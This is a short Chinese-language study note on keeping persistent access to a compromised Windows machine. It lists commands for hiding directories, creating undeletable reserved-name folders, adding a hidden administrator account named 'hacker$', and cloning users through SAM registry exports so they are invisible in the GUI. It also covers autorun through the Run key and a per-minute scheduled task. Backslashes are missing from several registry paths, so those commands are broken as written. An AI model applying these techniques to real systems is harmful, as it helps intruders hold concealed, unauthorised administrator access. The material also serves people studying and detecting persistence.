学习笔记3 windows权限维持

学习笔记3 windows权限维持

windows权限维持

权限维持要点文件隐藏用户隐藏自动运行

权限维持要点

1、权限维持最重要的是隐藏。
2、只需在入口等关键点做权限维持即可

文件隐藏

1、目录隐藏
attrib +a +s +r +h 目录名
隐藏后通过cmd的dir或是图形界面均无法发现，除非知道目录名直接通过cmd访问。

2、畸形目录

md 目录名...                         #创建目录
rd /s /q 目录名...                   #删除目录

以此方式创建的目录无法被del直接删除，无法使用cd或dir对其 *** 作，从图形界面也无法进入，但可以通过cmd向其中复制文件，或直接访问该文件。

使用aux、com1、com2、prn、con、nul等系统保留文件名创建文件或目录无法通过常规方式删除。无论创建删除还是访问都需要再完整路径前加//./来访问，否则将被当作io设备处理。

md \.C:UsersuserDesktoptestprn
rd \.C:UsersuserDesktoptestprn

用户隐藏

net user hacker$ abcd1234 /add
net localgroup /add administrators hacker$          #将创建的用户添加到管理员组

在用户名后加$创建隐藏用户，无法通过net users查看，但可以通过net user用户名或图形界面查看
通过 *** 作注册表可创建图形界面不可见的用户。

HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers   #用户信息注册表

win10默认无法看到默认注册表中的信息，需点击编辑-》权限，在图片所示位置打勾。

reg query HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames
mkdir C:/reg
reg export HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameslow$ C:low.reg
type C:low.reg
reg query HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers
reg export HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00003EB C:low1.reg

net user hacker$ /del
regedit /s hacker.reg     #这里的是导出的注册表文件名
regedit /s hacker1.reg   #这里的是导出的注册表文件名

自动运行

1、在注册表中添加开机启动项

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun" /v mytask /t reg_sz /d "C:UsersqzhDesktoptask.bat"

2、添加计划任务
创建计划任务每分钟执行一次

schtasks /create /tn taskhacker /tr "C:UsersqzhDesktoptask.bat" /sc minute /mo 1